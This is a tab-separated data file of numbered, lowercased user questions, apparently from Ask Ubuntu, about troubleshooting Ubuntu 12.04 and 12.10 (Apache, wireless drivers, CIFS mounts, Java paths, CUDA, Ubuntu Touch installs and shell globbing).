259241	apache 2 could not bind , address already in use	i installed apache 2 on ubuntu 12.10 . when i try to start the service using sudo /etc/init.d/apache2 start , i get the following message . *starting web server apache2 ( 98 ) address already in use : make_sock : could not bind to address 127.0.0.1:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . [ fail ]
259242	ubuntu 12.10 not installing ?	i had downloaded ubuntu 12.10 today morning , in torrent form , it was about 700 mb . than i clicked the setup which is `wubi.exeâ´ . it completed the downloaded , than it stated `` expanding '' , it expanded more than 50 % , and now it ( the progress ) has stopped ? it 's been like 3 hours , and not a single percent has increased ? what to do ? as i am writing now , it 's still showing expanding , please help , and by the way , i am new to ubuntu
259252	wireless networks not working	i am running ubuntu 12.10 alongside windows 7 i can connect to the internet using ethernet but can not detect any wireless networks . when i use windows 7 i can connect fine . any help would be greatly appreciated . the output for lspci -v | grep -ia 10 network was : 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 flags : bus master , fast devsel , latency 0 , irq 11 memory at c0500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > lsmod : module size used by joydev 17457 0 snd_hda_codec_hdmi 32007 1 snd_hda_codec_conexant 57842 1 rfcomm 46619 12 bnep 18140 2 parport_pc 32688 0 ppdev 17073 0 lp 17759 0 parport 46345 3 parport_pc , ppdev , lp coretemp 13400 0 kvm_intel 132759 0 kvm 414070 1 kvm_intel ghash_clmulni_intel 13180 0 cryptd 20403 1 ghash_clmulni_intel dell_wmi 12681 0 sparse_keymap 13890 1 dell_wmi psmouse 95552 0 dell_laptop 17369 0 dcdbas 14438 1 dell_laptop microcode 22803 0 snd_hda_intel 33491 3 snd_hda_codec 134212 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec uvcvideo 76749 0 videobuf2_core 32851 1 uvcvideo videodev 120309 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12860 1 uvcvideo videobuf2_memops 13368 1 videobuf2_vmalloc snd_pcm 96580 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30512 1 snd_seq_midi wmi 19070 1 dell_wmi btusb 18334 0 bluetooth 209199 22 rfcomm , bnep , btusb snd_seq_midi_event 14899 1 snd_seq_midi mac_hid 13205 0 snd_seq 61521 2 snd_seq_midi , snd_seq_midi_event snd_timer 29425 2 snd_pcm , snd_seq snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq rts5139 356158 0 snd 78734 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , s nd_rawmidi , snd_seq , snd_timer , snd_seq_device i915 520519 3 drm_kms_helper 46784 1 i915 drm 275528 4 i915 , drm_kms_helper i2c_algo_bit 13413 1 i915 soundcore 15047 1 snd snd_page_alloc 18484 2 snd_hda_intel , snd_pcm serio_raw 13215 0 lpc_ich 17061 0 mei 40690 0 video 19335 1 i915 r8169 61650 0 iwconfig : eth0 no wireless extensions . lo no wireless extensions . rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no
259257	formatting aand setting up raid on a secondary and tertiary drive	i am a ubuntu server newbie and an amateur , more like a newbie , with ubuntu desktop . so fyi ... sorry for any potential redundancy , but most of the formation i have found is to setup raid on a fresh install . i set up ubuntu server 12.04 lts on a 500 gb drive . i plan to utilize this drive for the to boot the ubuntu file system , programs etc . i also have two 2 tb wd red drives that i would like to use for the data . i have found this in order to mount and format a new drive . although it is for 9.04 is it still relevant ? is ext 4 a good idea if the client accessing the server is windows ? if the core of the tutorial is still relevant , once that is done i need some guidance on setting up the two drive in a raid 1 format . ultimately the server is going to be a simple file server with mysql in order to run a database for a cad program in windows . i am open to any tutorials or guidance that can be provided , thank you in advance .
259258	ca n't confirm wine installation on ubuntu12.04	it might be a stupid question , but , is there any way to install wine on ubuntu 12.04 without having to accept the eula ? i have ubuntu 12.04 installed in an virtual machine in vmwar workstation 9 . i wanted to install wine via the following three commands : sudo add-apt-reopsitory ppa : ubuntu-wine/ppa sudo apt-get update sudo apt-get install wine1.4-i386 by the way , is it correct to choose wine1.4-i386 ? it was suggested when i simply typed wine . the message was : the program 'wine ' is currently not installed . you can install it by typing : sudo apt-get install wine1.4-i386 '' it all worked well , until i had to click to accept the eula . for any reason , the clicks on < ok > were n't accepted , and i ca n't get further . so it seems , that a solution would be , if it is possible to install wine without having to click on < ok > . is this possible ? any help appreciated !
259261	does synaptic only install required packages ?	just installed mesa-utils using apt-get and noticed there were packages installed no longer required . i removed the package using autoremove , then used synaptic to re-install . i 'm looking for the most efficient method to keep my new conversion to ubuntu and linux current . thanks in advance , pete slight refinement - will synaptic ignore outdated dependent packages ?
259275	why and how firefox shows youtube video despite all plugins are disabled , including shockwave flash ones ?	when i open a video url i see a div with the message : this plugin is disabled . manage plugins ... then in few seconds the video starts . why ? how ?
259277	openfire 3.8.0 can not find jre 7	i 've installed the official oracle java on my ubuntu machine . for that i did the following : download the latest jre for x64 ( .tar.gz ) unpacked this archive on my windows machine uploaded the folder jre_1.7.0 to my ubuntu machine ( via ftp ) used update-alternatives -- install and update-alternatives -- set to install java when i tried java -version , ubuntu said permission denied . so i manually added the execution permission ( chmod ) to all files in jre_1.7.0/bin . then , java -version worked : java version `` 1.7.0_15 '' java ( tm ) se runtime environment ( build 1.7.0_15-b03 ) java hotspot ( tm ) 64-bit server vm ( build 23.7-b01 , mixed mode ) for installing openfire ( xmpp server ) , which did not work , i tried the following : download the latest .deb package install it via sudo dpkg -i openfire_3.8.0_all.deb this failed due to the following dependency problem : dpkg : regarding openfire_3.8.0_all.deb containing openfire , pre-dependency problem : openfire pre-depends on sun-java5-jre | sun-java6-jre | default-jre-headless | openjdk-6-jre sun-java5-jre is not installed . sun-java6-jre is not installed . default-jre-headless is not installed . openjdk-6-jre is not installed but configs remain . dpkg : error processing openfire_3.8.0_all.deb ( -- install ) : pre-dependency problem - not installing openfire why does n't it find java ? what am i doing wrong ? thanks in advance !
259281	how to capture from tv card using mencoder ?	how do i capture from tv card ( /dev/video0 ) using mencoder ? i tried with mencoder -tv driiver=v4l2 : width=640 : height=480 : norm=pal_nc : inpu t=1 : chanlist=us_cable : channel=13 -ffourcc divx -fps 25 -ovc lavc -lavcopts vcodec=mpeg4 : vhq -oac mp3lame -lameopts cbr : br=128 -endpos 30 -o outfile.mpg tv : // but , it does not work i get the following error : mencoder svn r34540 ( ubuntu ) , built with gcc-4.7 ( c ) 2000-2012 mplayer team error parsing option on the command line : -tv exiting ... ( error parsing command line )
259286	will ubuntu phone support java ?	i 'm a java developer and i was so excited when i heard that ubuntu is going mobile ... but will it support a java runtime environment like ubuntu desktop and windows 8 pro ? a lot of enterprise applications are running with swing graphical toolkit , and its successor javafx2 offers some enhanced features for the java world . will canonical close their platform from other languages and runtimes in order to promote canonical 's solution ( qt/qml/c++ based ) ?
259287	unsure if my ram speed is set correctly	edit : thank you for reopening i have an an amd apu as my cpu/gpu ( specs below ) and its graphical performance benefits greatly from higher speed ram . in my motherboard bios i have set the memory clock speed to 2133mhz . however , when i check my ram speed through the terminal with lshw and dmidecode -- type 17 it shows my speeds as 800mhz . are lshw and dmidecode showing the wrong information ? can ubuntu take advantage of my higher speed ram at all ? specs : cpu : amd a10-5800k ram : 8gb ( 2x4gb ) g.skill ares @ 2133mhz mobo : asrock fm2a85x-itx lshw results : dmidecode results : ( running ubuntu 12.10 and using amds 13.1 catalyst drivers )
259288	avoiding the execution upon its installation ldap-auth-config	i am trying to automate ( by using a bash script ) the installation of packages for ldap authentication . however , the script is being interrupted by the ldap-auth-config dialog . is there a way to avoid this ?
259289	virtual windows 7 on ubuntu host ; not able to share folders	i have a windows 7 64 bit installed in virtualbox on my ubuntu 12.10 64 bit . i have network running in both , and i would like to share my ( home\dropbox ) folder on my ubuntu with windows . but i havenâ´t been able to find guides on doing this , so can anybody help ? i have set the dropbox folder to share via virtualbox with full access and automount , but i cant find it on the windows . rasmus
259290	strange conky background behavior	i have created a custom conky showing weather forecasts in 3 cities like this : but recently i 've begun to see a strange behavior . after a few seconds , a white background a bit larger appears underneath like this : i 've attempted to overcome this by trying a number of changes in the configuration file .conkyrc and the only effective one was changing own_window_type value from override to normal . but then i not only have this conky disappear when i choose to minimize all windows , but it also displays a transparent background of the same size like this : my conky window settings are like this : update_interval 1 total_run_times 0 cpu_avg_samples 1 net_avg_samples 1 no_buffers yes double_buffer yes imlib_cache_size 0 background yes own_window yes own_window_type override own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager minimum_size 300 480 maximum_width 300 alignment top_right gap_x 2 gap_y 28 draw_borders no draw_graph_borders no stippled_borders 0 border_inner_margin 0 border_outer_margin 0 border_width 0 text_buffer_size 1024 override_utf8_locale yes use_xft yes xftfont ubuntu : size=10 xftalpha 1.0 uppercase no temperature_unit celsius draw_shades no draw_outline no default_color c0c0c0 default_shade_color 000000 default_outline_color c0c0c0 color1 c0c0c0 color2 b2b2b2 color3 808080 color4 d4d4d4 text $ { image ~/.conky/base.png -p 0,0 -s 300x480 } can somebody tell what might be causing ( and how can i overcome ) this unwanted canvas underneath my conky window ?
259292	why is this `cp` command trying to remove files ?	i am using ubuntu 12.04.2 lts on a dell 50-50 laptop . everything went fine until : [ 1635 ] [ lam @ ubuntu : ~/bin ] $ ll total 48 -rwxr-xr-x 1 lam lam 232 jan 27 20:37 demo.sh -rwxr-xr-x 1 lam lam 34 aug 26 22:02 encore.sh -rwxr-xr-x 1 lam lam 94 nov 13 16:54 esame.sh -rwxr-xr-x 1 lam lam 156 jan 20 14:21 ginfo.sh -rwxr-xr-x 1 lam lam 61 oct 31 15:56 hello_world.sh -rwxr-xr-x 1 lam lam 2323 jan 20 13:36 infoscript -rwxrwxr-x 1 lam lam 257 dec 4 17:22 local-variable -rwxr-xr-x 1 lam lam 16 jan 28 15:2 [ 1638 ] [ lam @ ubuntu : ~/bin ] $ cp sayh.sh temp/sayh2.sh~ rm : can not remove `sayh.sh ' : no such file or directory rm : can not remove `temp/sayh2.sh~ ' : no such file or directory i am trying to copy a file , yet ubuntu apparently tries to remove it . can anybody explain it ?
259293	will this sudo rule allow a user to update the system and nothing more ?	i want to design a sudo rule that will allow the user ricardo to update the system using aptitude , but prevent him from using sudo to run any other command ( he 's a problem user ) . are there any pitfalls to this rule that i 'm missing ? ricardo all= ( root ) /usr/bin/aptitude ricardo only uses aptitude , not apt-get . also , i do n't have ubuntu installed anywhere at the moment , so i understand that /usr/bin/aptitude might not be the exact right file to allow . if there are pitfalls to this rule , how can i improve it ?
259295	manual mounting of cifs works fine , but not in fstab	i have a mounting problem that drives me mad at the moment ... using the manual mounting command sudo mount -t cifs //192.168.1.1/sharename /media/sharename -o uid=1000 , gid=1000 , rw , username='domain/name ' , password=pw i am able to mount my network share without any problem . but then , when i include the line //192.168.1.1/sharename /media/sharename cifs uid=1000 , gid=1000 , rw , username='domain/name ' , password=pw 0 0 into fstab and execute then the command sudo mount -a i receive the error message mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) when i restart the computer the boot process is as it should be without any errors , but the share is n't mounted . does anybody know if this is a bug ? ! or do i miss there something ? thanks for reading this ... ps : i do not have any white spaces in the network share name or any 'weird ' characters in the password . also the cifs-utils are installed . the additional option users in the fstab did n't helped either . of course i 'll use later the credential file when the fstab entry works , at the moment i use the password in fstab just for testing purposes ( and it did n't worked neither when i tried the credential file instead ) ... pps : i use kubuntu 12.10 , but i hope this does n't matter ...
259302	getting back my windows data !	running out the door my foot grabbed the wire and my laptop to the floor . the hard drive ended up being the problem with the boot . hard drive still spins so i know there 's hope ! looking , i did n't find any data recovery programs for ubuntu that i think could recover this particular data for me . and even if there was , the hard drive was running windows 7 home edition and 6 years of data ( some of which i paid for ) from it . so i figure it 's probably best , since it 's windows 7 , to run a windows based data recovery program to best pull it off so i can convert all my 6 year prescious onto my new ubuntu 12.04 only box . does anyone have any easy fast ways i can approach this with ?
259303	how do updates work ?	i 'm using ubuntu 12.04 and at least once a week i get important and recommended updates . these weekly updates are normally between 50-100 mb , and sometimes they 're over 200 mb . i have n't installed anything new in a few months , but those large updates keep coming fairly consistently . it 's hard to know what i 'm actually downloading , but since it 's labeled as important and recommended , it 's hard to reject it . my question : when i download that 100 mb update , does the stuff it replaces get thrown away , or will i just keep accumulating more and more data just by running my system ?
259319	ubuntu sdk does not install on ubuntu 12.04 64bit ?	trying to install the ubuntu-sdk on ubuntu 12.04 64bit using instructions at http : //developer.ubuntu.com/get-started/gomobile/ and i get the following errors : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-sdk : depends : ubuntu-qtcreator-qt5libs but it is not going to be installed depends : ubuntu-qtcreator-plugins but it is not going to be installed e : unable to correct problems , you have held broken packages . it appears that android-tools-adb is missing . i am able to get this installed but when trying to install ubuntu-sdk i am told that there is a an error ( conflict with qt4 and qt5 ) and that qtchooser will not install . e : /var/cache/apt/archives/qtchooser_0.0.1~git20121229.g8f08405-0ubuntu1~precise1~test5_amd64.deb : trying to overwrite '/usr/bin/qdbusxml2cpp ' , which is also in package libqt4-dev i hear some people saying that the sdk can only be installed on ubuntu 12.10 ... .is this still the case ? i really want to write apps . thanks in advance ...
259321	change super + left and super + right windows positions on gnome shell	in gnome shell , when i hit the super+left keys , the active window is moved and resized to fit in the left exact half part of the screen i 'd like super-left to take 3/4th of the screen instead . i think i could do that with a shell extension but i 'm wondering if there 's a simpler more native way to achive that . associating that to a new keys combination would also be a suitable solution . thanks .
259322	nvidia geforce 210 2 monitors switchable , not the same desktop	i want to have zwo separate monitors , my computer-monitor to work and my hd-tv for watching movies . i work with the normal nvidia driver from the ubuntu repositories with ubuntu 12.04 . now i only have my desktop on my tv over hdmi , my primary monitor has no signal . is there a way to switch between the two monitors ?
259325	installing cuda on ubuntu 12.10 geforce gt 630	what are your impressions about installing cuda api on ubuntu 12.10 ? i 've read about some incompatibility with gcc ( here i.e . ) , that you have to reinstall v.4.4 , but even then you can have crush of your system . since i do n't want to reinstall sys again ( i did it a couple of times recently : p ) i 'd like to ask you if this script is safe on my x64 ubuntu 12.10 on amd proc . my accepted answer allowed to install cuda 3 components with 4.6 , but driver is not appropriate , maybe only gcc-4.4 and g++-4.4 is indeed appropriate - now i try 4.4 so please read soroosh129 answer and then apply my additional suggestions while doing as he described . additional notes : you have to add cuda to path and ld_library_path , i have added following to .bashrc in my home and in root home folder : export path= $ path : /usr/local/cuda-5.0/bin export ld_library_path= $ ld_library_path : /usr/local/cuda-5.0/lib64 : /lib finally i have installed without driver . just cuda toolkit and samples without driver , and use my default `` nvidia binary xorg driver , kernel module and vdpau library from nvidia-current '' . with result > toolkit : installed , samples : instaled but also > `` incomplete installation . this did n't install cuda driver . driver > version at least 304.54 required for cuda 5.0 to work '' probably this is correctly installed , i have done make in clock sample with following result : me @ comp : /usr/local/cuda-5.0/samples/0_simple/clock $ ls clock.cu makefile nsighteclipse.xml readme.txt me @ comp : /usr/local/cuda-5.0/samples/0_simple/clock $ sudo make [ sudo ] password for me : /usr/local/cuda-5.0/bin/nvcc -m64 -gencode arch=compute_10 , code=sm_10 -gencode arch=compute_20 , code=sm_20 -gencode arch=compute_30 , code=sm_30 -gencode arch=compute_35 , code=sm_35 -i/usr/local/cuda-5.0/include -i . -i.. -i../../common/inc -o clock.o -c clock.cu g++ -m64 -o clock clock.o -l/usr/local/cuda-5.0/lib64 -lcudart mkdir -p ../../bin/linux/release cp clock ../../bin/linux/release me @ comp : /usr/local/cuda-5.0/samples/0_simple/clock $ ./clock cuda clock sample gpu device 0 : `` geforce gt 630 '' with compute capability 2.1 total clocks = 54830 me @ comp : /usr/local/cuda-5.0/samples/0_simple/clock $ and another example : me @ comp : /usr/local/cuda-5.0/samples/0_simple $ cd asyncapi me @ comp : /usr/local/cuda-5.0/samples/0_simple/asyncapi $ ls asyncapi.cu makefile nsighteclipse.xml readme.txt me @ comp : /usr/local/cuda-5.0/samples/0_simple/asyncapi $ sudo make /usr/local/cuda-5.0/bin/nvcc -m64 -gencode arch=compute_10 , code=sm_10 -gencode arch=compute_20 , code=sm_20 -gencode arch=compute_30 , code=sm_30 -gencode arch=compute_35 , code=sm_35 -i/usr/local/cuda-5.0/include -i . -i.. -i../../common/inc -o asyncapi.o -c asyncapi.cu g++ -m64 -o asyncapi asyncapi.o -l/usr/local/cuda-5.0/lib64 -lcudart mkdir -p ../../bin/linux/release cp asyncapi ../../bin/linux/release me @ comp : /usr/local/cuda-5.0/samples/0_simple/asyncapi $ ls asyncapi asyncapi.cu asyncapi.o makefile nsighteclipse.xml readme.txt me @ comp : /usr/local/cuda-5.0/samples/0_simple/asyncapi $ ./asyncapi [ ./asyncapi ] - starting ... gpu device 0 : `` geforce gt 630 '' with compute capability 2.1 cuda device [ geforce gt 630 ] time spent executing by the gpu : 32.30 time spent by cpu in cuda calls : 0.04 cpu executed 114066 iterations while waiting for gpu to finish me @ comp : /usr/local/cuda-5.0/samples/0_simple/asyncapi $ here is related issue on stackoverflow . thank you soroosh129 !
259326	clicking sound settings crashes gnome-control-center	i am a new ubuntu user , having only just installed ubuntu 12.10 on a few pcs and using it for basic stuff ( web/mail , music , video , etc ) . i love both the idea of open-source and the actual system itself , and despite some onboarding problems , i see myself using it more regularly . i do have the following problem : ubuntu is giving me only 2 channels of sound on my 5.1 system . when i try to change the sound settings ( eg . click on sound settings from either the control center or the sound icon ) , the window briefly pops up , then disappears . sometimes this will land me a bug report prompt , sometimes it wo n't . i thought about whether or not i should make a post here or just make a bug report ; i ran a bunch of searches for similar issues , but they do n't really match mine . specifically , i do have working sound ( albeit stereo ) and music applications and the like appear to function perfectly . i can also access alsamixer without problems , but changing volume settings there , for instance , does nothing . here 's my output from aplay -l : **** list of playback hardware devices **** card 0 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : ca0106 [ ca0106 ] , device 0 : ca0106 [ ca0106 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : ca0106 [ ca0106 ] , device 1 : ca0106 [ ca0106 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : ca0106 [ ca0106 ] , device 2 : ca0106 [ ca0106 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : ca0106 [ ca0106 ] , device 3 : ca0106 [ ca0106 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 as you can see , it shows the hda nvidia card as card 0 . i figured that could be part of the crashing problem , but it would n't explain why i do have stereo sound . i hope someone can help me out . if i need to post any more information , please let me know . thanks in advance !
259327	how can i control indicator and webapps in unity ?	i do not clearly understand the behavior of webapps and indicator in ubuntu 12.10 . for example i installed webapps ( google calendar ) and an indicator ( weather ) from official repository . how can i use them ? where are they ? moreover , i do not understand why thunderbird is not a part of the envelope icon ?
259330	is ubuntu on tablet also suitable for touchscreen laptops ?	i have a thinkpad x220 tablet , if i am not wrong is that they call a `` convertible '' laptop . there will be the possibility to use ubuntu on tablet ( or even ubuntu for phones ) with this kind of laptops in order to get full advantage from both the laptop and tablet features ? up to now , due to the lack of user experience ( scrolling , zooming , hand gestures , pointer , bugs in the workspace window positioning while rotating ) i use the tablet feature only to sign pdf with the embedded pen . i am aware of this topic : '' will the ubuntu for tablets work on my tablet ? '' but it misses the `` convertible laptop '' category .
259334	need to change a key from greater than less than to backslash pipe	i started a programming class and found i ca n't type in a backslash or a pipe because the corresponding key is mapped to a greater than less than symbol . how do i change the key over when i ca n't use xev to determine it 's behavior ?
259336	multirom nexus 7 question	i have a nexus 7 ( wifi ) with multirom . i can install a .zip rom or a ubuntu image whithout wipe the data and boot one or another . but i do n't know what image have i to download from your download page . can you help me ?
259338	is there an ubuntu touch emulator or a way to install it in a vm ?	is there any way to install ubuntu touch inside a virtual machine on a regular ubuntu computer instead of on a phone or tablet ? or is there an emulator , like the one the android sdk comes with ?
259339	converting multiple files with avconv ... libmp3lame0 not found	i have about 20 .webm files that i would like to convert to audio in the terminal . i want to do avconv -i *.webm -acodec libmp3lame0 -aq 4 *.mp3 i tried : for i in *.webm ; do avconv -i `` $ { i } '' -acodec libmp3lame0 -aq 4 `` $ { i % .wemb } .mp3 '' ; done but it says `` libmp3lame0 encoder not found . '' it is installed , though . i also installed ubuntu-restricted-extras and reinstalled libav-tools . i also tried for i in *.webm ; do avconv -i `` $ { i } '' -acodec -aq 4 `` $ { i % .wemb } .ogg '' ; done to remove the whole mp3/lame aspect , but then it just said '.ogg encoder not found . ' this worked once before when i tried to convert using libmp3lame0 without the for loop ... but i just tried to convert one file and it does n't work anymore . thanks . ( i 'm using 12.10 . )
259340	how do i create a start up image	i have a just out of the box dell vostro 2520 laptop running ubunto 12.04. on start up i was prompted to make a factory setting image file . i had no flash drive . went to get one . my daughter played around . now i ca n't figure out how to create that image file . question : how can i create that start up image ?
259342	ubuntu phone for cdma ?	will there ever be a version of ubuntu phone for the cdma variants of the galaxy nexus ? ( sprint & verizon ) i own the sprint version of the phone and would love to try out the os since i love the desktop version of ubuntu . thanks ethan
259343	wireless adapter detects networks but can not connect after recent update in 12.04	my wireless adapter detects my wifi network , but when i attempt to connect by entering the key , it attempts the connection for a minute and then fails . it was working fine until an update about a week ago . ~ $ sudo lshw -c network *-network description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:24 : d6:4d : ad:18 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-38-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:47 memory : dc100000-dc101fff
259350	how to set java path in ubuntu 12.04 ?	so java -version give path not found . i have tried the following : edit : ~/.bashrc ~/.profile /etc/environment bash.bashrc files and add to them the following : java_home=/usr/lib/jvm/jdk1.7.0_15 path= $ path : $ home/bin : $ java_home/bin jre_home=/usr/lib/jvm/jre1.7.0_15 path= $ path : $ home/bin : $ jre_home/bin export java_home export jre_home export path in addition , i also manually added the java bin directory to path . path= '' /usr/lib/jvm/jre1.7.0_15/bin : /usr/lib/jvm/jdk1.7.0_15/bin : /bin : /sbin : /usr/bin : /usr/sbin : /usr/local/sbin : /usr/local/bin : /usr/games '' i have restarted my computer several times but i still get bash : /usr/local/bin/java : no such file or directory
259351	touch installer command sudo apt-get update does n't work	w : fehlschlag beim holen von http : //ppa.launchpad.net/phablet-team/tools/ubuntu/dists/oneiric/main/source/sources 404 not found w : fehlschlag beim holen von http : //ppa.launchpad.net/phablet-team/tools/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : fehlschlag beim holen von http : //ppa.launchpad.net/phablet-team/tools/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : manche indexdateien konnten nicht heruntergeladen werden . sie wurden ignoriert oder an ihrer stelle 채ltere verwendet . error downloading these files . when i click them the server gives an error , too . please help . i want ubuntu on my phone
259354	how do i connect to my bluetooth headset ?	i have an acer c7 chromebook with ubuntu 12.04 installed . also i have two apps installed bluetooth manager and bluetooth . i am trying to connect meelectronics af9-bk air-fi stereo bluetooth wireless headset with microphone , http : //www.amazon.com/dp/b006qb1rm2/ref=pe_175190_21431760_m3t1_st1_dp_1 to ubuntu . i have tried to setup new device and pair , but the headset is never recognized . also i checked hard and soft setting for bluetooth and they are on . any suggestion . please note - i am new to ubuntu 12.04 and linux and need specific instructions .
259356	programmer and student on ubuntu ?	i 'm currently set up with a windows 7 pc for work , with notepad++ and sublime text 2 , and a xampp server . i 'm also using the pc for studying . i 'm considering switching to ubuntu , but i wan na make sure i do n't lose functionality . the thing is i 've heard badly about the libreoffice and openoffice compared to microsoft office . is there anything about libreoffice and openoffice i should know ? also is there a good multiple programming language , syntax highlighting editor built in to ubuntu , or a good one anyone can recommend ?
259363	qtcreator plugins and templates missing	i just downloaded the ubuntu phone sdk and qt creator according to the instructions . when i fire up qtcreator , i get a screen as shown if i ignore this message and hit continue , there are no templates to create the mobile application as indicated in the tutorial i 'm following . i tried installing qt5-default and qtchooser - problem still persists . here is the error message can not load plugin because dependency failed to load : remotelinux ( 2.6.82 ) reason : can not load plugin because dependency failed to load : qtsupport ( 2.6.82 ) reason : can not load plugin because dependency failed to load : projectexplorer ( 2.6.82 ) reason : /usr/lib/i386-linux-gnu/qtcreator/plugins/qtproject/libprojectexplorer.so : can not load library /usr/lib/i386-linux-gnu/qtcreator/plugins/qtproject/libprojectexplorer.so : ( libqt5declarative.so.5 : can not open shared object file : no such file or directory )
259364	ways to deploy node.js in a production environment ?	what is the recommended way to deploy node.js on ubuntu 12.04 in a production environment ? i saw this ppa but i do n't know if is well maintained or if it will and if is a source in witch one can trust . i know that is easy install node.js manually , but seem to me that install it using the ubuntu packages manager will allow me safe some management time and will be more integrated with the way the underlying server is being currently management . so , what are your recommendations ? thanks in advanced .
259369	ubuntutouch - mako ( nexus 4 ) black screen after install	just tried to install the developer preview for ubuntu touch , all went fine but now the device does n't seem to boot up . basically a black screen after the google logo . any ideas anyone ? cheers
259370	wired connection periodically lost in ubuntu 12.10 ( ar8161 )	wired connection is lost periodically and not reestablished until rebooting . i bought desktop and install fresh ubuntu 12.10 . my network card with atheros communications inc. ar8161 gigabit ethernet was n't define automatically but i install drivers from backports . sudo apt-get install linux-backports-modules-cw-3.6-precise-generic sudo modprobe alx now internet work just fine but sometimes connection is lost and not recovery until rebooting computer . is it possible fix this behavior ? update : i found in syslog next line : kernel : [ 82944.115285 ] icmpv6 : nd : ndisc_build_skb failed to allocate an skb , err=-11 could it be reason of instability ?
259372	what can be causing /etc/cron.daily/apt to hang ?	lately i 've been getting a mail from the server every day , subject cron < root @ host > test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) body /etc/cron.daily/apt : db update failed , database locked if i just run the /etc/cron.daily/apt part it just stays there with no output , i tried running tail -f /var/log/apt/*.log /var/log/syslog & and then running /etc/cron.daily/apt but no output either which database is locked and by what , i 'm able to do apt-get update successfully . did some updates yesterday and had to restart , so the microsoft fix wont work here ( this has been going on since before the updates so not related ) what else can i look into ? this is a amazon instance incase it matters
259376	error when installing ubuntu touch developer preview	i installed ubuntu phone os on my galaxy nexus . at the last steps an error occured : pushing /home/cesare/scaricati/phablet-flash/95/quantal-preinstalled-phablet-armhf.zip to /sdcard/ protocol failure error while excetuting adb push /home/cesare/scaricati/phablet-flash/95/quantal-preinstalled-phablet-armhf.zip /sdcard/ make sure the device is connected and viewable by running 'adb devices' ensure you have a root device , one which running 'adb root ' does not return an error cesare @ ubuntu : ~ $ what can i do ? update i have enabled usb debugging ecc ...
259381	no windows boot launcher when startup	http : //www.ubuntu.com/download/help/install-ubuntu-with-windows the last step says i have the option to pick ubuntu or windows as my os when i start my computer up , i goes straight to ubuntu . i think ubuntu is nice and all , however is is n't for me . what do i do to get the option of windows as an os again ?
259382	why does a samba share printer not prompt for user and password in windows 7 clients ?	i have installed samba with cups on ubuntu server and i shared a canon imagerunner 1133 . the printer works fine no problem but i want windows clients to prompt for user and password when users click on the printer share . now even though i set guest ok = no under [ printers ] section the windows 7 client does not prompt for user , when i click the printer it says no driver found . i installed the driver it prints without password please help .
259383	how can i get mv ( or the * wildcard ) to move hidden files ?	i am migrating my home directory from an old system to a new one , and the tarball i made contains everything , including hidden files like .bashrc . however , when i move the contents of the unpacked tarball ( which are in /tmp ) to my new home directory , the hidden files do not copy ( mv /tmp/home/rcook/* /home/rcook/ ) . how can i get mv to move them ? actually , i think the problem is not with mv , but with bash 's globbing . if i do this : mkdir a mkdir b touch a/.foo touch a/bar mv a/* b/ ls -a a/ b/ i see this : a/ : . .. .foo b/ : . .. bar a/.foo did not move . so how can i get the * wildcard to find hidden files ? yes , i suppose i could decompress the tarball directly into my home directory , but the tarball decompresses into home/rcook/ ... , and i want to be sure i overwrite the new .bashrc , etc . with the old , customized versions , and knowing how to find and move hidden files is a worthwhile skill . suggestions ? some answers suggest doing something like mv src/ . * dest/ . however , i tried this on my test directories and got errors . starting with : rcook $ ls -a a/ b/ a/ : . .. bar .foo b/ : . .. rcook $ mv a/ . * b/ mv : can not move 'a/ . ' to 'b/ . ' : device or resource busy mv : can not remove 'a/.. ' : is a directory rcook $ ls -a a/ b/ a/ : . .. bar b/ : . .. .foo what am i doing wrong ?
259385	parallels virtual ubuntu 12.04 not booting	i am using ubuntu 12.04 in parallels desktop 7 . i was trying to sudo apt-get install subversion . but i was asked to apt-get -f install . i did it . but after some time , i was asked to restart my virtual system . as there was no menu for shut down in ubuntu . i shut down my virtual system from parallel 's toolbars . but now it wo n't boot . ! my boot screen is now http : //dl.dropbox.com/u/69889915/screen % 20shot % 202013-02-22 % 20at % 2012.09.37 % 20am.png how to fix it ?
